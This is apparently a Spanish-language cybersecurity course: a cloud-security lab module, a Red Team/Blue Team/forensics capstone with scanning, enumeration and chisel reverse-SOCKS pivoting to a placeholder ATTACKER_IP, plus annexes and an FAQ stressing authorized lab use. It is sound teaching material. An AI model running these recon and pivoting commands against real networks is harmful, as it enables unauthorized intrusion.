• IAM: Identity and Access Management, control de usuarios, roles y permisos.
• KMS: Key Management Service, servicio para manejar llaves de cifrado.
• Pipeline CI/CD: Flujo automatizado de integración y despliegue de software.
• Shift-left security: Incorporar controles de seguridad en fases tempranas del desarrollo.

🧰 Prerrequisitos del laboratorio

• Cuenta de laboratorio en AWS Free Tier, Azure Student o GCP Free Tier.
• CLI de proveedor cloud instalada (aws, az, gcloud).
• Repositorio Git con pipeline CI/CD (GitHub Actions, GitLab CI, Jenkins).
• Herramientas sugeridas: tfsec, Checkov, Trivy, AWS CLI, Azure CLI, GCloud CLI.

🛠️ Laboratorio 1 — Configuración segura de IAM y redes

        # Crear usuario con permisos limitados
        aws iam create-user --user-name usuario-lab
        aws iam attach-user-policy --user-name usuario-lab --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

        # Crear VPC y restringir acceso SSH solo a IPs específicas
        aws ec2 create-security-group --group-name SG-Lab --description "SSH solo desde admin"
        aws ec2 authorize-security-group-ingress --group-name SG-Lab --protocol tcp --port 22 --cidr 203.0.113.0/24
      

        # Crear grupo de recursos y usuario con rol limitado
        az group create --name RG-Lab --location eastus
        az ad user create --display-name "UsuarioLab" --user-principal-name usuario.lab@dominio.onmicrosoft.com --password 'ContraseñaSegura123'

        # Crear NSG y permitir solo SSH desde IP segura
        az network nsg create --resource-group RG-Lab --name NSG-Lab
        az network nsg rule create --resource-group RG-Lab --nsg-name NSG-Lab --name SSH-Allow \
        --priority 100 --source-address-prefixes 203.0.113.0/24 --destination-port-ranges 22 --access Allow --protocol Tcp --direction Inbound
      

        # Crear cuenta de servicio con permisos mínimos
        gcloud iam service-accounts create sa-lab --display-name "Cuenta Servicio Lab"
        gcloud projects add-iam-policy-binding $PROJECT_ID --member="serviceAccount:sa-lab@$PROJECT_ID.iam.gserviceaccount.com" --role="roles/storage.objectViewer"

        # Regla de firewall para permitir SSH desde IP segura
        gcloud compute firewall-rules create allow-ssh-admin --allow tcp:22 --source-ranges 203.0.113.0/24
      

🔐 Laboratorio 2 — Cifrado y protección de datos

1. Configura un bucket o contenedor de almacenamiento con cifrado por defecto (KMS).
2. Sube un archivo de prueba y verifica su estado de cifrado.
3. Implementa versionado para prevenir pérdida de datos.

        # Crear bucket con cifrado SSE-KMS
        aws s3api create-bucket --bucket lab-bucket --region us-east-1
        aws s3api put-bucket-encryption --bucket lab-bucket --server-side-encryption-configuration '{
            "Rules": [{
                "ApplyServerSideEncryptionByDefault": { "SSEAlgorithm": "aws:kms" }
            }]
        }'
      

        # Crear cuenta de almacenamiento con cifrado por defecto
        az storage account create --name almacenlab --resource-group RG-Lab --location eastus --sku Standard_LRS --encryption-services blob
      

        # Crear bucket con cifrado por KMS
        gcloud storage buckets create lab-bucket --encryption-key=projects/$PROJECT_ID/locations/global/keyRings/my-keyring/cryptoKeys/my-key
      

⚙️ Laboratorio 3 — Seguridad en CI/CD (DevSecOps)

1. Configura un pipeline que incluya escaneo de infraestructura como código (IaC) con tfsec o Checkov.
2. Agrega análisis de contenedores con Trivy.
3. Configura notificaciones en caso de hallazgos críticos.

    # Ejemplo GitHub Actions
    name: DevSecOps Pipeline
    on: [push]
    jobs:
    security-scan:
        runs-on: ubuntu-latest
        steps:
        - uses: actions/checkout@v2
        - name: Scan IaC with tfsec
            run: |
            curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install.sh | bash
            ./tfsec .
        - name: Scan containers with Trivy
            run: |
            curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh
            ./trivy image my-app:latest
  

⚠️ Errores Comunes

• Usar credenciales embebidas en el código o repositorios.
• No configurar MFA en cuentas con privilegios.
• Dejar recursos expuestos a Internet sin restricción.
• No integrar escaneos automáticos en el pipeline.

📋 Trabajo Práctico del Módulo 15

📦 Instrucciones de Entrega

1. Configura un entorno seguro en AWS/Azure/GCP con IAM, red y cifrado.
2. Implementa un pipeline con escaneo IaC y contenedores.
3. Documenta hallazgos y mejoras aplicadas.

📦 Formato de Entrega

modulo15_Apellido_Nombre.zip
    ├─ configuracion_cloud/
    │  ├─ iam.txt
    │  ├─ firewall.txt
    │  └─ cifrado.txt
    ├─ pipeline/
    │  ├─ pipeline.yml
    │  └─ resultados_scans.txt
    └─ informe/
    └─ informe_cloud.pdf

📏 Rúbrica de Evaluación

• Configuración Cloud (40%)
• Pipeline DevSecOps (40%)
• Informe y documentación (20%)

📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con ISO/IEC 27017 (Seguridad en la nube), ISO/IEC 27018 (Protección de datos personales en la nube), NIST SP 800-190 (Application Container Security Guide) y OWASP SAMM (Software Assurance Maturity Model).

🚀 Cierre del Módulo

Con este módulo podrás implementar y mantener entornos cloud seguros y automatizados, integrando la seguridad en todo el ciclo de desarrollo. El próximo módulo cerrará la formación con Proyecto Final y Evaluación Integral.

🏛️ Módulo 16: Proyecto Final Integrador

Cierre del recorrido de 0 a master. Integrarás ofensiva (Red Team), defensa (Blue Team) y forense en un único caso realista, midiendo tu efectividad con métricas operativas. El objetivo es demostrar manejo técnico, metodología y comunicación ejecutiva.

• Planificar y ejecutar un ejercicio adversarial controlado end-to-end.
• Detectar, contener y erradicar la amenaza; preservar evidencias y analizarlas.
• Medir MTTD/MTTR y validar controles con indicadores de efectividad.
• Redactar informe técnico y ejecutivo, y defender el proyecto.

🎭 Fase 0 — Historia del Caso (Contexto Narrativo)

TechCorp (empresa ficticia de SaaS) reporta alertas anómalas en el SIEM: intentos de autenticación fallidos y actividad sospechosa en una VM de aplicaciones. Tu equipo debe:

1. Red Team (lab): Simular al actor con alcance y reglas de compromiso definidas.
2. Blue Team (lab): Detección, contención, erradicación y recuperación con registro completo.
3. Forense (lab): Adquisición de evidencia (disco/memoria) y análisis con herramientas libres.

Alcance de laboratorio sugerido: 2 subredes (DMZ: web/app; LAN: AD/DB), 1 host atacante (Kali/Parrot), 3 VMs objetivo (Web, Win Server AD, Linux App), SIEM (p. ej., Wazuh/Graylog), IDS/NDR (Suricata/Zeek).

📚 Glosario Técnico

• MTTD/MTTR: Tiempo de detección / tiempo de respuesta.
• IOC/IOA: Indicadores de Compromiso / de Ataque.
• Containment: Acciones para limitar el alcance de un incidente.
• Lessons Learned: Revisión estructurada posterior al incidente.

🧰 Prerrequisitos del laboratorio

• Autorización explícita y entorno aislado (VMs, snapshots, red de lab).
• Herramientas ofensivas: nmap, feroxbuster, metasploit, chisel/sshuttle.
• Herramientas defensivas: SIEM (Wazuh/Graylog), IDS/NDR (Suricata/Zeek), sysmon/logs.
• Herramientas forenses: dcfldd/dd, hashdeep, Autopsy, Volatility.

🛠️ Laboratorio 1 — Plan & Reglas de Compromiso (ROE) + Reconocimiento

Fundamento: Sin alcance claro y ROE, no hay pentest profesional.

# Recon activo autorizado (laboratorio)
sudo nmap -sS -sV -O -T3 -p- 10.10.0.0/24 -oA recon_dmz

# Descubrimiento de contenido web
feroxbuster -u http://10.10.0.15 -w /usr/share/wordlists/dirb/common.txt -o ferox_dmz.txt
      

# Validación de puertos desde host Windows de monitoreo
Test-NetConnection 10.10.0.15 -Port 80
Test-NetConnection 10.10.0.15 -Port 443

# Consulta de eventos (si Blue ya configuró Sysmon)
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -MaxEvents 20
      

🛠️ Laboratorio 2 — Red Team vs Blue Team (Ataque/Detección/Contención)

Fundamento: Ejercicio adversarial controlado con medidas de seguridad y reversión.

# (Red) Explotación controlada con Metasploit (solo módulos de prueba)
msfconsole -q -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 10.10.0.15; run; exit"

# (Red) Pivoting en lab con chisel
# Atacante:
chisel server -p 9001 --reverse
# Host intermedio (lab):
chisel client ATTACKER_IP:9001 R:1080:socks
# Ruteo de herramientas por SOCKS
proxychains nmap -sT -Pn 10.20.0.0/24 -oA pivot_lan
      

# (Blue) Búsqueda de IOCs (ejemplos)
Get-WinEvent -LogName Security -MaxEvents 50 | Where-Object {$_.Message -match "Logon"}
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -MaxEvents 50

# (Blue) Contención (lab): aislamiento lógico (ejemplo)
# En Linux con firewall (en host afectado del lab)
sudo iptables -A INPUT -s 10.10.0.0/24 -j DROP

# (Blue) Validación con IDS/NDR
# Revisar alertas Suricata/Zeek en el SIEM y generar timeline
      

🛠️ Laboratorio 3 — Forense: Adquisición y Análisis

• Adquisición de disco/memoria (copia bit a bit + hash).
• Análisis de artefactos (Autopsy) y memoria (Volatility).
• Construcción de línea de tiempo y hallazgos clave.

# Adquisición bit a bit + hash
sudo dcfldd if=/dev/sdb of=imagen_sdb.dd hash=sha256 hashlog=hash.txt

# Autopsy: New Case -> Add Data Source -> Disk Image (GUI)

# Volatility (perfil según imagen)
volatility -f memoria.raw imageinfo
volatility -f memoria.raw --profile=Win10x64_19041 pslist
volatility -f memoria.raw --profile=Win10x64_19041 netscan
      

# FTK Imager (GUI) para adquisición en formato E01
# Verificación de hash (SHA-256) al finalizar.
      

🛠️ Laboratorio 4 — Métricas, Validación y Lecciones Aprendidas

Fundamento: No se mejora lo que no se mide.

• Calcula MTTD y MTTR a partir del timeline del SIEM.
• Valida controles: ¿IDS alertó? ¿SIEM correlacionó? ¿Reglas/hardening fueron efectivas?
• Registra Lessons Learned y un plan de mejoras priorizadas (Quick Wins / Mid-Term).

📋 Trabajo Práctico del Módulo 16

📦 Instrucciones de Entrega

1. Diseña el ejercicio (ROE, alcance, arquitectura de lab y plan de pruebas).
2. Ejecuta Red vs Blue + Forense con registro de evidencias y tiempos.
3. Mide MTTD/MTTR e incluye indicadores de efectividad de controles.
4. Entrega informe técnico, informe ejecutivo y presentación de defensa.

📦 Formato de Entrega

modulo16_Apellido_Nombre.zip
├─ plan/
│  ├─ alcance_ROE.pdf
│  └─ arquitectura_lab.png
├─ evidencias/
│  ├─ recon_*.nmap
│  ├─ ferox_*.txt
│  ├─ pivot_*.nmap
│  ├─ siem_alertas.csv
│  ├─ ids_events.json
│  └─ capturas/
├─ forense/
│  ├─ hash.txt
│  ├─ imagen_sdb.dd (o E01)   # (si pesa mucho, incluir hash + ruta privada)
│  ├─ memoria.raw (idem nota)
│  └─ analisis_autopsy_volatility.pdf
├─ timelines/
│  ├─ timeline_incidente.csv
│  └─ mttd_mttr.xlsx
└─ informes/
   ├─ informe_tecnico.pdf
   ├─ informe_ejecutivo.pdf
   └─ presentacion_defensa.pdf

📏 Rúbrica de Evaluación

• Plan & ROE (20%) — Alcance, riesgos, OPSEC, arquitectura y criterios de salida.
• Red vs Blue (30%) — Ejecución controlada, detección, contención y trazabilidad.
• Forense (25%) — Adquisición íntegra, análisis y hallazgos reproducibles.
• Métricas & Mejora (15%) — Cálculo MTTD/MTTR y plan de mejoras.
• Comunicación (10%) — Informe ejecutivo y defensa clara.

✅ Checklist de Calidad

• [ ] ROE y alcance firmados para el laboratorio.
• [ ] Evidencias completas (recon, explotación controlada, detección, contención).
• [ ] Adquisición forense con hash y análisis documentado.
• [ ] Timeline con MTTD/MTTR y validación de controles.
• [ ] Informes técnico + ejecutivo + presentación de defensa.
• [ ] Reversión de cambios y snapshots restaurados.

🔒 Notas éticas y accesibilidad

• Prohibido ejecutar fuera del entorno de laboratorio o sin autorización formal.
• Prioriza PoC no destructivos y reversibles. Documenta todo.
• Anonimiza datos sensibles y respeta cadena de custodia.

📘 Conexión con Estándares (contexto profesional)

Alineado con PTES/OSSTMM (pruebas de intrusión), ISO/IEC 27035 (gestión de incidentes), NIST SP 800-61 (Incident Handling), ISO/IEC 27037 (evidencia digital), y CIS Controls v8 (8, 13, 17, 18).

🚀 Cierre del Módulo

Este proyecto sintetiza tu dominio técnico y metodológico. Al completarlo, podrás planificar, ejecutar, detectar, responder y analizar incidentes complejos con comunicación clara hacia equipos técnicos y ejecutivos — el sello de un profesional de ciberseguridad de nivel avanzado.

📚 Anexos y Recursos Extra

Esta sección reúne materiales adicionales que complementan los módulos del curso. Incluye glosarios, plantillas, guías rápidas y enlaces a herramientas para seguir aprendiendo y practicando.

📖 Glosario de Términos Clave

• BCP (Business Continuity Plan): Plan de continuidad del negocio que asegura la operación ante una crisis.
• DRP (Disaster Recovery Plan): Plan de recuperación ante desastres para restaurar servicios críticos.
• EDR (Endpoint Detection and Response): Herramienta para detectar y responder a amenazas en endpoints.
• SIEM (Security Information and Event Management): Plataforma para recolectar, analizar y correlacionar eventos de seguridad.
• OSINT (Open Source Intelligence): Inteligencia obtenida de fuentes públicas.
• Phishing: Técnica de ingeniería social para engañar y obtener información confidencial.
• Hardening: Proceso de reforzar la seguridad de un sistema.
• RTO/RPO: Objetivos de tiempo y punto de recuperación en planes de continuidad.

🗂️ Plantillas Descargables

• Plantilla de Análisis de Impacto en el Negocio (BIA)
• Plantilla de Plan de Respuesta a Incidentes
• Plantilla de Informe Forense
• Plantilla de Auditoría de Seguridad

🛠️ Herramientas Recomendadas

• Wireshark: Análisis de tráfico de red.
• Metasploit: Plataforma para pruebas de penetración.
• OpenVAS: Escaneo de vulnerabilidades.
• Maltego: Análisis de relaciones y OSINT.
• Splunk / ELK Stack: Gestión y análisis de logs.
• TryHackMe / Hack The Box: Plataformas de laboratorio práctico.

🎓 Recursos para Certificaciones

• CompTIA Security+ — Página oficial
• Microsoft Security, Compliance, and Identity — Microsoft Learn
• ISO 27001 — Norma y guías oficiales
• CEH (Certified Ethical Hacker) — EC-Council

💡 Consejos Finales

• Dedica al menos 2-3 horas semanales a practicar en entornos seguros.
• Mantente actualizado siguiendo blogs y podcasts de ciberseguridad.
• Conéctate con comunidades en línea y participa en CTFs (Capture The Flag).
• Documenta tus prácticas y proyectos para fortalecer tu portafolio profesional.

Consejo: La clave para crecer en ciberseguridad es la práctica constante y la curiosidad por aprender más allá de lo básico.

❓ Preguntas Frecuentes

En esta sección encontrarás respuestas a las dudas más comunes sobre el curso, los contenidos, la metodología y el uso de las herramientas. Si tu pregunta no está aquí, siempre puedes consultar en la comunidad o al equipo de soporte.

📌 Sobre el Curso

• ¿Necesito conocimientos previos en ciberseguridad? No es obligatorio, pero se recomienda tener nociones básicas de informática y redes para aprovechar al máximo el contenido.
• ¿Cuánto tiempo necesito para completar el curso? Aproximadamente 3 a 6 meses dedicando entre 4 y 6 horas semanales, dependiendo de tu ritmo de estudio.
• ¿El curso es 100% online? Sí, puedes acceder al contenido desde cualquier lugar y dispositivo con conexión a internet.
• ¿Recibo certificado al finalizar? Sí, recibirás un certificado digital con validez curricular y verificable en línea.

⚙️ Sobre el Contenido Técnico

• ¿Necesito instalar software especializado? Sí, para los laboratorios prácticos usarás herramientas como Wireshark, Metasploit y entornos virtualizados.
• ¿Incluye prácticas con entornos reales? Sí, pero siempre en entornos controlados y seguros, evitando riesgos en sistemas productivos.
• ¿Hay soporte para la instalación y configuración de herramientas? Sí, tendrás guías paso a paso y asistencia técnica durante el curso.
• ¿Se incluyen contenidos sobre IA aplicada a ciberseguridad? Sí, en módulos dedicados como IA ofensiva/defensiva y automatización con scripting.

📄 Sobre la Evaluación

• ¿Cómo se evalúa mi progreso? Mediante mini-quizzes, laboratorios prácticos y un Proyecto Final Integrador.
• ¿Es obligatorio entregar todos los laboratorios? Sí, son parte esencial de la evaluación y la práctica real.
• ¿Puedo rehacer un laboratorio si no me sale bien? Claro, puedes repetirlo cuantas veces sea necesario para alcanzar el nivel requerido.

🛡️ Sobre la Seguridad y la Ética

• ¿Puedo usar las técnicas aprendidas en sistemas ajenos? No. Todo el conocimiento adquirido debe aplicarse únicamente en entornos autorizados y con permiso explícito.
• ¿El curso cubre leyes y regulaciones? Sí, hay módulos dedicados a la ética, la legalidad y el marco normativo de la ciberseguridad.
• ¿Se enseñan técnicas ofensivas? Sí, pero únicamente con fines educativos y en entornos de laboratorio controlados.

📬 ¿Aún tienes dudas?

Puedes contactarnos en soporte@ciberseguridadmaster.com o acceder al espacio de comunidad para preguntar directamente a instructores y compañeros.

Consejo: Antes de preguntar, revisa el glosario y los anexos; muchas veces la respuesta está ahí y aprendes algo extra en el camino.